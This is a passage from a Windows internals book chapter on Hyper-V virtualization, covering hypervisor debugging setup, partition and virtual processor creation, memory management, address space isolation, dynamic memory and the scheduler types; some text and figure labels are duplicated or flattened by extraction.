(where XX is the bus number, YY is the device number, and ZZ is the function number). You
can discover the bus parameters of your network card through the Device Manager applet or
through the KDNET.exe tool available in the Windows SDK:
bcdedit /hypervisorsettings net hostip:<HostIp> port:<HostPort>
bcdedit /set {hypervisorsettings} hypervisordebugpages 1000
bcdedit /set {hypervisorsettings} hypervisorbusparams <NetCardBusParams>
bcdedit /set hypervisordebug on
The following figure shows a sample system in which the network interface used for debug-
ging the hypervisor is located in the 0.25.0 bus parameters, and the debugger is targeting a host
system configured with the IP address 192.168.0.56 on the port 58010.
Take note of the returned debugging key. After you reboot the debugged system, you should
run Windbg in the host, with the following command:
windbg.exe -d -k net:port=<HostPort>,key=<DebuggingKey>
You should be able to debug the hypervisor, and follow its startup sequence, even though
Microsoft may not release the symbols for the main hypervisor module:
CHAPTER 9 Virtualization technologies
277
In a VM with nested virtualization enabled, you can enable the L1 hypervisor debugger only
through the serial port by using the following command in the debugged system:
bcdedit /hypervisorsettings SERIAL DEBUGPORT:1 BAUDRATE:115200
The creation of the root partition and the boot virtual processor
The first steps that a fully initialized hypervisor needs to execute are the creation of the root partition
and the first virtual processor used for starting the system (called BSP VP). Creating the root partition
follows almost the same rules as for child partitions; multiple layers of the partition are initialized one
after the other. In particular:
1.
The VM-layer initializes the maximum allowed number of VTL levels and sets up the partition
privileges based on the partition’s type (see the previous section for more details). Furthermore,
the VM layer determines the partition’s allowable features based on the specified partition’s
compatibility level. The root partition supports the maximum allowable features.
2.
The VP layer initializes the virtualized CPUID data, which all the virtual processors of the parti-
tion use when a CPUID is requested from the guest operating system. The VP layer creates the
hypervisor process, which backs the partition.
3.
The Address Manager (AM) constructs the partition’s initial physical address space by using
machine platform-dependent code (which builds the EPT for Intel, NPT for AMD). The con-
structed physical address space depends on the partition type. The root partition uses identity
mapping, which means that all the guest physical memory corresponds to the system physical
memory (more information is provided later in this chapter in the “Partitions’ physical address
space” section).
In a VM with nested virtualization enabled, you can enable the L1 hypervisor debugger only
through the serial port by using the following command in the debugged system:
bcdedit /hypervisorsettings SERIAL DEBUGPORT:1 BAUDRATE:115200
278
CHAPTER 9 Virtualization technologies
Finally, after the SynIC, IOMMU, and the intercepts’ shared pages are correctly configured for the
partition, the hypervisor creates and starts the BSP virtual processor for the root partition, which is the
unique one used to restart the boot process.
A hypervisor virtual processor (VP) is represented by a big data structure (VM_VP), shown in
Figure 9-6. A VM_VP data structure maintains all the data used to track the state of the virtual proces-
sor: its platform-dependent registers state (like general purposes, debug, XSAVE area, and stack) and
data, the VP’s private address space, and an array of VM_VPLC data structures, which are used to track
the state of each Virtual Trust Level (VTL) of the virtual processor. The VM_VP also includes a pointer to
the VP’s backing thread and a pointer to the physical processor that is currently executing the VP.
Intercept Packet
Backing Thread
Virtual Registers
State
Pointer to the
Physical CPU_PLS
VM_VPLC Array
VP’s Private Address
Space and Zone
SynIC Data
VTL 1
VTL 0
Physical CPU
FIGURE 9-6 The VM_VP data structure representing a virtual processor.
As for the partitions, creating the BSP virtual processor is similar to the process of creating normal
virtual processors. VmAllocateVp is the function responsible in allocating and initializing the needed
memory from the partition’s compartment, used for storing the VM_VP data structure, its platform-
dependent part, and the VM_VPLC array (one for each supported VTL). The hypervisor copies the initial
processor context, specified by the HvLoader at boot time, into the VM_VP structure and then cre-
ates the VP’s private address space and attaches to it (only in case address space isolation is enabled).
Finally, it creates the VP’s backing thread. This is an important step: the construction of the virtual
processor continues in the context of its own backing thread. The hypervisor’s main system thread at
this stage waits until the new BSP VP is completely initialized. The wait brings the hypervisor scheduler
to select the newly created thread, which executes a routine, ObConstructVp, that constructs the VP in
the context of the new backed thread.
ObConstructVp, in a similar way as for partitions, constructs and initializes each layer of the virtual
processor—in particular, the following:
1.
The Virtualization Manager (VM) layer attaches the physical processor data structure (CPU_PLS)
to the VP and sets VTL 0 as active.
CHAPTER 9 Virtualization technologies
279
2.
The VAL layer initializes the platform-dependent portions of the VP, like its registers, XSAVE
area, stack, and debug data. Furthermore, for each supported VTL, it allocates and initializes
the VMCS data structure (VMCB for AMD systems), which is used by the hardware for keeping
track of the state of the virtual machine, and the VTL’s SLAT page tables. The latter allows each
VTL to be isolated from each other (more details about VTLs are provided later in the “Virtual
Trust Levels (VTLs) and Virtual Secure Mode (VSM)” section) . Finally, the VAL layer enables
and sets VTL 0 as active. The platform-specific VMCS (or VMCB for AMD systems) is entirely
compiled, the SLAT table of VTL 0 is set as active, and the real-mode emulator is initialized. The
Host-state part of the VMCS is set to target the hypervisor VAL dispatch loop. This routine is
the most important part of the hypervisor because it manages all the VMEXIT events generated
by each guest.
3.
The VP layer allocates the VP’s hypercall page, and, for each VTL, the assist and intercept mes-
sage pages. These pages are used by the hypervisor for sharing code or data with the guest
operating system.
When ObConstructVp finishes its work, the VP’s dispatch thread activates the virtual processor and
its synthetic interrupt controller (SynIC). If the VP is the first one of the root partition, the dispatch
thread restores the initial VP’s context stored in the VM_VP data structure by writing each captured
register in the platform-dependent VMCS (or VMCB) processor area (the context has been specified
by the HvLoader earlier in the boot process). The dispatch thread finally signals the completion of the
VP initialization (as a result, the main system thread enters the idle loop) and enters the platform-
dependent VAL dispatch loop. The VAL dispatch loop detects that the VP is new, prepares it for the first
execution, and starts the new virtual machine by executing a VMLAUNCH instruction. The new VM
restarts exactly at the point at which the HvLoader has transferred the execution to the hypervisor. The
boot process continues normally but in the context of the new hypervisor partition.
The hypervisor memory manager
The hypervisor memory manager is relatively simple compared to the memory manager for NT or the
Secure Kernel. The entity that manages a set of physical memory pages is the hypervisor’s memory
compartment. Before the hypervisor startup takes palace, the hypervisor loader (Hvloader.dll) allocates
the hypervisor loader block and pre-calculates the maximum number of physical pages that will be
used by the hypervisor for correctly starting up and creating the root partition. The number depends
on the pages used to initialize the IOMMU to store the memory range structures, the system PFN data-
base, SLAT page tables, and HAL VA space. The hypervisor loader preallocates the calculated number
of physical pages, marks them as reserved, and attaches the page list array in the loader block. Later,
when the hypervisor starts, it creates the root compartment by using the page list that was allocated
by the hypervisor loader.
Figure 9-7 shows the layout of the memory compartment data structure. The data structure keeps
track of the total number of physical pages “deposited” in the compartment, which can be allocated
somewhere or freed. A compartment stores its physical pages in different lists ordered by the NUMA
node. Only the head of each list is stored in the compartment. The state of each physical page and
its link in the NUMA list is maintained thanks to the entries in the PFN database. A compartment also
280
CHAPTER 9 Virtualization technologies
tracks its relationship with the root. A new compartment can be created using the physical pages that
belongs to the parent (the root). Similarly, when the compartment is deleted, all its remaining physical
pages are returned to the parent.
Global Zone
Parent
Compartment
Physical Pages Lists
# of Deposited Pages
# of Free Pages
Node 0
Node N
PFN Database
PFN 24
PFN 25
PFN 5A
PFN 5B
PFN CB
PFN 7A
PFN A4
PFN B6
FIGURE 9-7 The hypervisor’s memory compartment. Virtual address space for the global zone is reserved from
the end of the compartment data structure
When the hypervisor needs some physical memory for any kind of work, it allocates from the ac-
tive compartment (depending on the partition). This means that the allocation can fail. Two possible
scenarios can arise in case of failure:
I
If the allocation has been requested for a service internal to the hypervisor (usually on behalf
of the root partition), the failure should not happen, and the system is crashed. (This explains
why the initial calculation of the total number of pages to be assigned to the root compartment
needs to be accurate.)
I
If the allocation has been requested on behalf of a child partition (usually through a hypercall),
the hypervisor will fail the request with the status INSUFFICIENT_MEMORY. The root partition
detects the error and performs the allocation of some physical page (more details are discussed
later in the “Virtualization stack” section), which will be deposited in the child compartment
through the HvDepositMemory hypercall. The operation can be finally reinitiated (and usually
will succeed).
The physical pages allocated from the compartment are usually mapped in the hypervisor using a
virtual address. When a compartment is created, a virtual address range (sized 4 or 8 GB, depending on
whether the compartment is a root or a child) is allocated with the goal of mapping the new compart-
ment, its PDE bitmap, and its global zone.
A hypervisor’s zone encapsulates a private VA range, which is not shared with the entire hypervisor
address space (see the “Isolated address space” section later in this chapter). The hypervisor executes
with a single root page table (differently from the NT kernel, which uses KVA shadowing). Two entries in
the root page table page are reserved with the goal of dynamically switching between each zone and
the virtual processors’ address spaces.
CHAPTER 9 Virtualization technologies
281
Partitions’ physical address space
As discussed in the previous section, when a partition is initially created, the hypervisor allocates a
physical address space for it. A physical address space contains all the data structures needed by the
hardware to translate the partition’s guest physical addresses (GPAs) to system physical addresses
(SPAs). The hardware feature that enables the translation is generally referred to as second level ad-
dress translation (SLAT). The term SLAT is platform-agnostic: hardware vendors use different names:
Intel calls it EPT for extended page tables; AMD uses the term NPT for nested page tables; and ARM
simply calls it Stage 2 Address Translation.
The SLAT is usually implemented in a way that’s similar to the implementation of the x64 page
tables, which uses four levels of translation (the x64 virtual address translation has already been dis-
cussed in detail in Chapter 5 of Part 1). The OS running inside the partition uses the same virtual address
translation as if it were running by bare-metal hardware. However, in the former case, the physical
processor actually executes two levels of translation: one for virtual addresses and one for translating
physical addresses. Figure 9-8 shows the SLAT set up for a guest partition. In a guest partition, a GPA is
usually translated to a different SPA. This is not true for the root partition.
Guide Physical
Memory
Page Tables A
Process A
Guest A
Host Physical Memory
EPT A
CR 3
1
2
3
4
1
2
3
4
560
564
568
570
560
564
568
570
FIGURE 9-8 Address translation for a guest partition.
When the hypervisor creates the root partition, it builds its initial physical address space by using
identity mapping. In this model, each GPA corresponds to the same SPA (for example, guest frame
0x1000 in the root partition is mapped to the bare-metal physical frame 0x1000). The hypervisor preal-
locates the memory needed for mapping the entire physical address space of the machine (which has
been discovered by the Windows Loader using UEFI services; see Chapter 12 for details) into all the
allowed root partition’s virtual trust levels (VTLs). (The root partition usually supports two VTLs.) The
SLAT page tables of each VTL belonging to the partition include the same GPA and SPA entries but usu-
ally with a different protection level set. The protection level applied to each partition’s physical frame
allows the creation of different security domains (VTL), which can be isolated one from each other. VTLs
are explained in detail in the section “The Secure Kernel” later in this chapter. The hypervisor pages
are marked as hardware-reserved and are not mapped in the partition’s SLAT table (actually they are
mapped using an invalid entry pointing to a dummy PFN).
282
CHAPTER 9 Virtualization technologies
Note For performance reasons, the hypervisor, while building the physical
memory mapping, is able to detect large chunks of contiguous physical mem-
ory, and, in a similar way as for virtual memory, is able to map those chunks by
using large pages. If for some reason the OS running in the partition decides to
apply a more granular protection to the physical page, the hypervisor would
use the reserved memory for breaking the large page in the SLAT table.
Earlier versions of the hypervisor also supported another technique for map-
ping a partition’s physical address space: shadow paging. Shadow paging was
used for those machines without the SLAT support. This technique had a very
high-performance overhead; as a result, it’s not supported anymore. (The ma-
chine must support SLAT; otherwise, the hypervisor would refuse to start.)
The SLAT table of the root is built at partition-creation time, but for a guest partition, the situation is
slightly different. When a child partition is created, the hypervisor creates its initial physical address space
but allocates only the root page table (PML4) for each partition’s VTL. Before starting the new VM, the
VID driver (part of the virtualization stack) reserves the physical pages needed for the VM (the exact
number depends on the VM memory size) by allocating them from the root partition. (Remember, we
are talking about physical memory; only a driver can allocate physical pages.) The VID driver maintains
a list of physical pages, which is analyzed and split in large pages and then is sent to the hypervisor
through the HvMapGpaPages Rep hypercall.
Before sending the map request, the VID driver calls into the hypervisor for creating the needed
SLAT page tables and internal physical memory space data structures. Each SLAT page table hierarchy
is allocated for each available VTL in the partition (this operation is called pre-commit). The operation
can fail, such as when the new partition’s compartment could not contain enough physical pages. In
this case, as discussed in the previous section, the VID driver allocates more memory from the root par-
tition and deposits it in the child’s partition compartment. At this stage, the VID driver can freely map
all the child’s partition physical pages. The hypervisor builds and compiles all the needed SLAT page
tables, assigning different protection based on the VTL level. (Large pages require one less indirection
level.) This step concludes the child partition’s physical address space creation.
Address space isolation
Speculative execution vulnerabilities discovered in modern CPUs (also known as Meltdown, Spectre,
and Foreshadow) allowed an attacker to read secret data located in a more privileged execution
context by speculatively reading the stale data located in the CPU cache. This means that software
executed in a guest VM could potentially be able to speculatively read private memory that belongs to
the hypervisor or to the more privileged root partition. The internal details of the Spectre, Meltdown,
and all the side-channel vulnerabilities and how they are mitigated by Windows have been covered in
detail in Chapter 8.
CHAPTER 9 Virtualization technologies
283
The hypervisor has been able to mitigate most of these kinds of attacks by implementing the
HyperClear mitigation. The HyperClear mitigation relies on three key components to ensure strong
Inter-VM isolation: core scheduler, Virtual-Processor Address Space Isolation, and sensitive data scrub-
bing. In modern multicore CPUs, often different SMT threads share the same CPU cache. (Details about
the core scheduler and symmetric multithreading are provided in the “Hyper-V schedulers” section.) In
the virtualization environment, SMT threads on a core can independently enter and exit the hypervisor
context based on their activity. For example, events like interrupts can cause an SMT thread to switch
out of running the guest virtual processor context and begin executing the hypervisor context. This can
happen independently for each SMT thread, so one SMT thread may be executing in the hypervisor
context while its sibling SMT thread is still running a VM’s guest virtual processor context. An attacker
running code in a less trusted guest VM’s virtual processor context on one SMT thread can then use a
side channel vulnerability to potentially observe sensitive data from the hypervisor context running on
the sibling SMT thread.
The hypervisor provides strong data isolation to protect against a malicious guest VM by maintain-
ing separate virtual address ranges for each guest SMT thread (which back a virtual processor). When
the hypervisor context is entered on a specific SMT thread, no secret data is addressable. The only data
that can be brought into the CPU cache is associated with that current guest virtual processor or rep-
resent shared hypervisor data. As shown in Figure 9-9, when a VP running on an SMT thread enters the
hypervisor, it is enforced (by the root scheduler) that the sibling LP is running another VP that belongs
to the same VM. Furthermore, no shared secrets are mapped in the hypervisor. In case the hypervisor
needs to access secret data, it assures that no other VP is scheduled in the other sibling SMT thread.
Core 0
L1 Data Cache
LP 0
HV
VM A
(VP 0)
LP 1
HV
VM A
(VP 1)
Core 1
L1 Data Cache
LP 0
HV
VM B
(VP 0)
LP 1
FIGURE 9-9 The Hyperclear mitigation.
Unlike the NT kernel, the hypervisor always runs with a single page table root, which creates a single
global virtual address space. The hypervisor defines the concept of private address space, which has
a misleading name. Indeed, the hypervisor reserves two global root page table entries (PML4 entries,
which generate a 1-TB virtual address range) for mapping or unmapping a private address space. When
the hypervisor initially constructs the VP, it allocates two private page table root entries. Those will be
used to map the VP’s secret data, like its stack and data structures that contain private data. Switching
the address space means writing the two entries in the global page table root (which explains why the
term private address space has a misleading name—actually it is private address range). The hypervisor
switches private address spaces only in two cases: when a new virtual processor is created and during
284
CHAPTER 9 Virtualization technologies
thread switches. (Remember, threads are backed by VPs. The core scheduler assures that no sibling SMT
threads execute VPs from different partitions.) During runtime, a hypervisor thread has mapped only
its own VP’s private data; no other secret data is accessible by that thread.
Mapping secret data in the private address space is achieved by using the memory zone, represent-
ed by an MM_ZONE data structure. A memory zone encapsulates a private VA subrange of the private
address space, where the hypervisor usually stores per-VP’s secrets.
The memory zone works similarly to the private address space. Instead of mapping root page table
entries in the global page table root, a memory zone maps private page directories in the two root
entries used by the private address space. A memory zone maintains an array of page directories, which
will be mapped and unmapped into the private address space, and a bitmap that keeps track of the
used page tables. Figure 9-10 shows the relationship between a private address space and a memory
zone. Memory zones can be mapped and unmapped on demand (in the private address space) but are
usually switched only at VP creation time. Indeed, the hypervisor does not need to switch them during
thread switches; the private address space encapsulates the VA range exposed by the memory zone.
PMLA Entry #192
PML4 Entry #2
PML4 Entry #3
PMLA Entry #320
PMLA Entry #480
Invalid
Invalid
0
0x100'00000000
0x200'00000000
0x7FFF'FFFFFFFF
0xFFFF8000'000000
0xFFFFF80'000000
0xFFFFFFFF'FFFFFFF
•••
••••
••••
••••
••••
••••
Zone PDPTE #256
Zone PDPTE #257
Zone PDPTE #258
Zone PDE #128
Zone PDE #256
Zone PDE #384
Invalid
Invalid
Zone's Page
Table
Zone's Page
Table
Zone's Page
Table
Shared Page
Table
Shared Page
Table
Shared Page
Directory
Shared Page
Directory
Shared Page
Table
Hypervisor's
Shared PDPT
Hypervisor's
Shared PDPT
Hypervisor's
Shared PDPT
Hypervisor’s Page
Table Root
(Maps the Entire HV)
Private Address Space
and Shared Page
Directory Pointers Tables
Private Zones
and Shared Page
Directories
Private Zones
and Share
Page Tables
FIGURE 9-10 The hypervisor’s private address spaces and private memory zones.
CHAPTER 9 Virtualization technologies
285
In Figure 9-10, the page table's structures related to the private address space are filled with a pat-
tern, the ones related to the memory zone are shown in gray, and the shared ones belonging to the hy-
pervisor are drawn with a dashed line. Switching private address spaces is a relatively cheap operation
that requires the modification of two PML4 entries in the hypervisor’s page table root. Attaching or
detaching a memory zone from the private address space requires only the modification of the zone’s
PDPTE (a zone VA size is variable; the PDTPE are always allocated contiguously).
Dynamic memory
Virtual machines can use a different percentage of their allocated physical memory. For example,
some virtual machines use only a small amount of their assigned guest physical memory, keeping a lot
of it freed or zeroed. The performance of other virtual machines can instead suffer for high-memory
pressure scenarios, where the page file is used too often because the allocated guest physical memory
is not enough. With the goal to prevent the described scenario, the hypervisor and the virtualization
stack supports the concept of dynamic memory. Dynamic memory is the ability to dynamically assign
and remove physical memory to a virtual machine. The feature is provided by multiple components:
I
The NT kernel’s memory manager, which supports hot add and hot removal of physical memory
(on bare-metal system too)
I
The hypervisor, through the SLAT (managed by the address manager)
I
The VM Worker process, which uses the dynamic memory controller module, Vmdynmem.dll,
to establish a connection to the VMBus Dynamic Memory VSC driver (Dmvsc.sys), which runs in
the child partition
To properly describe dynamic memory, we should quickly introduce how the page frame number
(PFN) database is created by the NT kernel. The PFN database is used by Windows to keep track of
physical memory. It was discussed in detail in Chapter 5 of Part 1. For creating the PFN database, the
NT kernel first calculates the hypothetical size needed to map the highest possible physical address
(256 TB on standard 64-bit systems) and then marks the VA space needed to map it entirely as reserved
(storing the base address to the MmPfnDatabase global variable). Note that the reserved VA space still
has no page tables allocated. The NT kernel cycles between each physical memory descriptor discov-
ered by the boot manager (using UEFI services), coalesces them in the longest ranges possible and,
for each range, maps the underlying PFN database entries using large pages. This has an important
implication; as shown in Figure 9-11, the PFN database has space for the highest possible amount of
physical memory but only a small subset of it is mapped to real physical pages (this technique is called
sparse memory).
286
CHAPTER 9 Virtualization technologies
MmPfnDatabase
Physical Memory
Pfn 0x500
Page 0x500
. . .
Page 0x5FF
Memory Hole*
No
Map
Pfn 0x5FF
Pfn 0x800
Pfn 0x8FF
Hot Removed
Memory
(set as Bad)
Page 0x800
. . .
Page 0x8FF
FIGURE 9-11 An example of a PFN database where some physical memory has been removed.
Hot add and removal of physical memory works thanks to this principle. When new physical
memory is added to the system, the Plug and Play memory driver (Pnpmem.sys) detects it and calls
the MmAddPhysicalMemory routine, which is exported by the NT kernel. The latter starts a complex
procedure that calculates the exact number of pages in the new range and the Numa node to which
they belong, and then it maps the new PFN entries in the database by creating the necessary page
tables in the reserved VA space. The new physical pages are added to the free list (see Chapter 5 in
Part 1 for more details).
When some physical memory is hot removed, the system performs an inverse procedure. It checks
that the pages belong to the correct physical page list, updates the internal memory counters (like the
total number of physical pages), and finally frees the corresponding PFN entries, meaning that they
all will be marked as “bad.” The memory manager will never use the physical pages described by them
anymore. No actual virtual space is unmapped from the PFN database. The physical memory that was
described by the freed PFNs can always be re-added in the future.
When an enlightened VM starts, the dynamic memory driver (Dmvsc.sys) detects whether the child
VM supports the hot add feature; if so, it creates a worker thread that negotiates the protocol and
connects to the VMBus channel of the VSP. (See the “Virtualization stack” section later in this chapter
for details about VSC and VSP.) The VMBus connection channel connects the dynamic memory driver
running in the child partition to the dynamic memory controller module (Vmdynmem.dll), which is
mapped in the VM Worker process in the root partition. A message exchange protocol is started. Every
one second, the child partition acquires a memory pressure report by querying different performance
counters exposed by the memory manager (global page-file usage; number of available, committed,
CHAPTER 9 Virtualization technologies
287
and dirty pages; number of page faults per seconds; number of pages in the free and zeroed page list).
The report is then sent to the root partition.
The VM Worker process in the root partition uses the services exposed by the VMMS balancer, a
component of the VmCompute service, for performing the calculation needed for determining the
possibility to perform a hot add operation. If the memory status of the root partition allowed a hot add
operation, the VMMS balancer calculates the proper number of pages to deposit in the child partition
and calls back (through COM) the VM Worker process, which starts the hot add operation with the as-
sistance of the VID driver:
1.
Reserves the proper amount of physical memory in the root partition
2.
Calls the hypervisor with the goal to map the system physical pages reserved by the root parti-
tion to some guest physical pages mapped in the child VM, with the proper protection
3.
Sends a message to the dynamic memory driver for starting a hot add operation on some guest
physical pages previously mapped by the hypervisor
The dynamic memory driver in the child partition uses the MmAddPhysicalMemory API exposed by
the NT kernel to perform the hot add operation. The latter maps the PFNs describing the new guest
physical memory in the PFN database, adding new backing pages to the database if needed.
In a similar way, when the VMMS balancer detects that the child VM has plenty of physical pages
available, it may require the child partition (still through the VM Worker process) to hot remove some
physical pages. The dynamic memory driver uses the MmRemovePhysicalMemory API to perform the
hot remove operation. The NT kernel verifies that each page in the range specified by the balancer is
either on the zeroed or free list, or it belongs to a stack that can be safely paged out. If all the condi-
tions apply, the dynamic memory driver sends back the “hot removal” page range to the VM Worker
process, which will use services provided by the VID driver to unmap the physical pages from the child
partition and release them back to the NT kernel.
Note Dynamic memory is not supported when nested virtualization is enabled.
Hyper-V schedulers
The hypervisor is a kind of micro operating system that runs below the root partition’s OS (Windows).
As such, it should be able to decide which thread (backing a virtual processor) is being executed by
which physical processor. This is especially true when the system runs multiple virtual machines com-
posed in total by more virtual processors than the physical processors installed in the workstation. The
hypervisor scheduler role is to select the next thread that a physical CPU is executing after the allocated
time slice of the current one ends. Hyper-V can use three different schedulers. To properly manage all
the different schedulers, the hypervisor exposes the scheduler APIs, a set of routines that are the only
entries into the hypervisor scheduler. Their sole purpose is to redirect API calls to the particular sched-
uler implementation.
288
CHAPTER 9 Virtualization technologies
EXPERIMENT: Controlling the hypervisor’s scheduler type
Whereas client editions of Windows start by default with the root scheduler, Windows Server 2019
runs by default with the core scheduler. In this experiment, you figure out the hypervisor scheduler
enabled on your system and find out how to switch to another kind of hypervisor scheduler on the
next system reboot.
The Windows hypervisor logs a system event after it has determined which scheduler to en-
able. You can search the logged event by using the Event Viewer tool, which you can run by typ-
ing eventvwr in the Cortana search box. After the applet is started, expand the Windows Logs
key and click the System log. You should search for events with ID 2 and the Event sources set to
Hyper-V-Hypervisor. You can do that by clicking the Filter Current Log button located on the
right of the window or by clicking the Event ID column, which will order the events in ascending
order by their ID (keep in mind that the operation can take a while). If you double-click a found
event, you should see a window like the following:
The launch event ID 2 denotes indeed the hypervisor scheduler type, where
1 = Classic scheduler, SMT disabled
2 = Classic scheduler
3 = Core scheduler
4 = Root scheduler
EXPERIMENT: Controlling the hypervisor’s scheduler type
Whereas client editions of Windows start by default with the root scheduler, Windows Server 2019
runs by default with the core scheduler. In this experiment, you figure out the hypervisor scheduler
enabled on your system and find out how to switch to another kind of hypervisor scheduler on the
next system reboot.
The Windows hypervisor logs a system event after it has determined which scheduler to en-
able. You can search the logged event by using the Event Viewer tool, which you can run by typ-
ing eventvwr in the Cortana search box. After the applet is started, expand the Windows Logs
key and click the System log. You should search for events with ID 2 and the Event sources set to
Hyper-V-Hypervisor. You can do that by clicking the Filter Current Log button located on the
right of the window or by clicking the Event ID column, which will order the events in ascending
order by their ID (keep in mind that the operation can take a while). If you double-click a found
event, you should see a window like the following:
The launch event ID 2 denotes indeed the hypervisor scheduler type, where
1 = Classic scheduler, SMT disabled
2 = Classic scheduler
3 = Core scheduler
4 = Root scheduler
CHAPTER 9 Virtualization technologies
289
The sample figure was taken from a Windows Server system, which runs by default with the
Core Scheduler. To change the scheduler type to the classic one (or root), you should open an ad-
ministrative command prompt window (by typing cmd in the Cortana search box and selecting
Run As Administrator) and type the following command:
bcdedit /set hypervisorschedulertype <Type>
where <Type> is Classic for the classic scheduler, Core for the core scheduler, or Root for the
root scheduler. You should restart the system and check again the newly generated Hyper-V-
Hypervisor event ID 2. You can also check the current enabled hypervisor scheduler by using an
administrative PowerShell window with the following command:
Get-WinEvent -FilterHashTable @{ProviderName="Microsoft-Windows-Hyper-V-Hypervisor"; ID=2}
-MaxEvents 1
The command extracts the last Event ID 2 from the System event log.
The classic scheduler
The classic scheduler has been the default scheduler used on all versions of Hyper-V since its initial
release. The classic scheduler in its default configuration implements a simple, round-robin policy in
which any virtual processor in the current execution state (the execution state depends on the total
number of VMs running in the system) is equally likely to be dispatched. The classic scheduler supports
also setting a virtual processor’s affinity and performs scheduling decisions considering the physical
processor’s NUMA node. The classic scheduler doesn’t know what a guest VP is currently executing.
The only exception is defined by the spin-lock enlightenment. When the Windows kernel, which is run-
ning in a partition, is going to perform an active wait on a spin-lock, it emits a hypercall with the goal
to inform the hypervisor (high IRQL synchronization mechanisms are described in Chapter 8, “System
mechanisms”). The classic scheduler can preempt the current executing virtual processor (which
hasn’t expired its allocated time slice yet) and can schedule another one. In this way it saves the active
CPU spin cycles.
The default configuration of the classic scheduler assigns an equal time slice to each VP. This means
that in high-workload oversubscribed systems, where multiple virtual processors attempt to execute,
and the physical processors are sufficiently busy, performance can quickly degrade. To overcome
The sample figure was taken from a Windows Server system, which runs by default with the
Core Scheduler. To change the scheduler type to the classic one (or root), you should open an ad-
ministrative command prompt window (by typing cmd in the Cortana search box and selecting
Run As Administrator) and type the following command:
bcdedit /set hypervisorschedulertype <Type>
where <Type> is Classic for the classic scheduler, Core for the core scheduler, or Root for the
<Type> is Classic for the classic scheduler, Core for the core scheduler, or Root for the
<Type>
root scheduler. You should restart the system and check again the newly generated Hyper-V-
Hypervisor event ID 2. You can also check the current enabled hypervisor scheduler by using an
administrative PowerShell window with the following command:
Get-WinEvent -FilterHashTable @{ProviderName="Microsoft-Windows-Hyper-V-Hypervisor"; ID=2}
-MaxEvents 1
The command extracts the last Event ID 2 from the System event log.
290
CHAPTER 9 Virtualization technologies
the problem, the classic scheduler supports different fine-tuning options (see Figure 9-12), which can
modify its internal scheduling decision:
I
VP reservations A user can reserve the CPU capacity in advance on behalf of a guest ma-
chine. The reservation is specified as the percentage of the capacity of a physical processor to
be made available to the guest machine whenever it is scheduled to run. As a result, Hyper-V
schedules the VP to run only if that minimum amount of CPU capacity is available (meaning that
the allocated time slice is guaranteed).
I
VP limits Similar to VP reservations, a user can limit the percentage of physical CPU usage for
a VP. This means reducing the available time slice allocated to a VP in a high workload scenario.
I
VP weight This controls the probability that a VP is scheduled when the reservations have
already been met. In default configurations, each VP has an equal probability of being executed.
When the user configures weight on the VPs that belong to a virtual machine, scheduling deci-
sions become based on the relative weighting factor the user has chosen. For example, let’s
assume that a system with four CPUs runs three virtual machines at the same time. The first VM
has set a weighting factor of 100, the second 200, and the third 300. Assuming that all the system’s
physical processors are allocated to a uniform number of VPs, the probability of a VP in the first
VM to be dispatched is 17%, of a VP in the second VM is 33%, and of a VP in the third one is 50%.
FIGURE 9-12 The classic scheduler fine-tuning settings property page, which is available
only when the classic scheduler is enabled.
CHAPTER 9 Virtualization technologies
291
The core scheduler
Normally, a classic CPU’s core has a single execution pipeline in which streams of instructions are
executed one after each other. An instruction enters the pipe, proceeds through several stages of
execution (load data, compute, store data, for example), and is retired from the pipe. Different types
of instructions use different parts of the CPU core. A modern CPU’s core is often able to execute in an
out-of-order way multiple sequential instructions in the stream (in respect to the order in which they
entered the pipeline). Modern CPUs, which support out-of-order execution, often implement what is
called symmetric multithreading (SMT): a CPU’s core has two execution pipelines and presents more
than one logical processor to the system; thus, two different instruction streams can be executed side
by side by a single shared execution engine. (The resources of the core, like its caches, are shared.) The
two execution pipelines are exposed to the software as single independent processors (CPUs). From
now on, with the term logical processor (or simply LP), we will refer to an execution pipeline of an SMT
core exposed to Windows as an independent CPU. (SMT is discussed in Chapters 2 and 4 of Part 1.)
This hardware implementation has led to many security problems: one instruction executed
by a shared logical CPU can interfere and affect the instruction executed by the other sibling LP.
Furthermore, the physical core’s cache memory is shared; an LP can alter the content of the cache. The
other sibling CPU can potentially probe the data located in the cache by measuring the time employed
by the processor to access the memory addressed by the same cache line, thus revealing “secret data”
accessed by the other logical processor (as described in the “Hardware side-channel vulnerabilities”
section of Chapter 8). The classic scheduler can normally select two threads belonging to different VMs
to be executed by two LPs in the same processor core. This is clearly not acceptable because in this
context, the first virtual machine could potentially read data belonging to the other one.
To overcome this problem, and to be able to run SMT-enabled VMs with predictable performance,
Windows Server 2016 has introduced the core scheduler. The core scheduler leverages the properties
of SMT to provide isolation and a strong security boundary for guest VPs. When the core scheduler is
enabled, Hyper-V schedules virtual cores onto physical cores. Furthermore, it ensures that VPs belong-
ing to different VMs are never scheduled on sibling SMT threads of a physical core. The core scheduler
enables the virtual machine for making use of SMT. The VPs exposed to a VM can be part of an SMT
set. The OS and applications running in the guest virtual machine can use SMT behavior and program-
ming interfaces (APIs) to control and distribute work across SMT threads, just as they would when
run nonvirtualized.
Figure 9-13 shows an example of an SMT system with four logical processors distributed in two CPU
cores. In the figure, three VMs are running. The first and second VMs have four VPs in two groups of two,
whereas the third one has only one assigned VP. The groups of VPs in the VMs are labelled A through E.
Individual VPs in a group that are idle (have no code to execute) are filled with a darker color.
292
CHAPTER 9 Virtualization technologies
Deferred List
Run List
VM # 1
VP
VP
VP
VP
B
A
VP
VP
A
VP
VP
C
VM # 2
VP
VP
VP
VP
D
C
VM # 3
VP
E
LP
LP
CPU Core #1
Deferred List
Run List
LP
LP
CPU Core #2
VP
VP
B
VP
VP
E
FIGURE 9-13 A sample SMT system with two processors’ cores and three VMs running.
Each core has a run list containing groups of VPs that are ready to execute, and a deferred list of
groups of VPs that are ready to run but have not been added to the core’s run list yet. The groups of
VPs execute on the physical cores. If all VPs in a group become idle, then the VP group is descheduled
and does not appear on any run list. (In Figure 9-13, this is the situation for VP group D.) The only VP of
the group E has recently left the idle state. The VP has been assigned to the CPU core 2. In the figure,
a dummy sibling VP is shown. This is because the LP of core 2 never schedules any other VP while its
sibling LP of its core is executing a VP belonging to the VM 3. In the same way, no other VPs are sched-
uled on a physical core if one VP in the LP group became idle but the other is still executing (such as for
group A, for example). Each core executes the VP group that is at the head of its run list. If there are no
VP groups to execute, the core becomes idle and waits for a VP group to be deposited onto its deferred
run list. When this occurs, the core wakes up from idle and empties its deferred run list, placing the
contents onto its run list.
CHAPTER 9 Virtualization technologies
293
The core scheduler is implemented by different components (see Figure 9-14) that provide strict
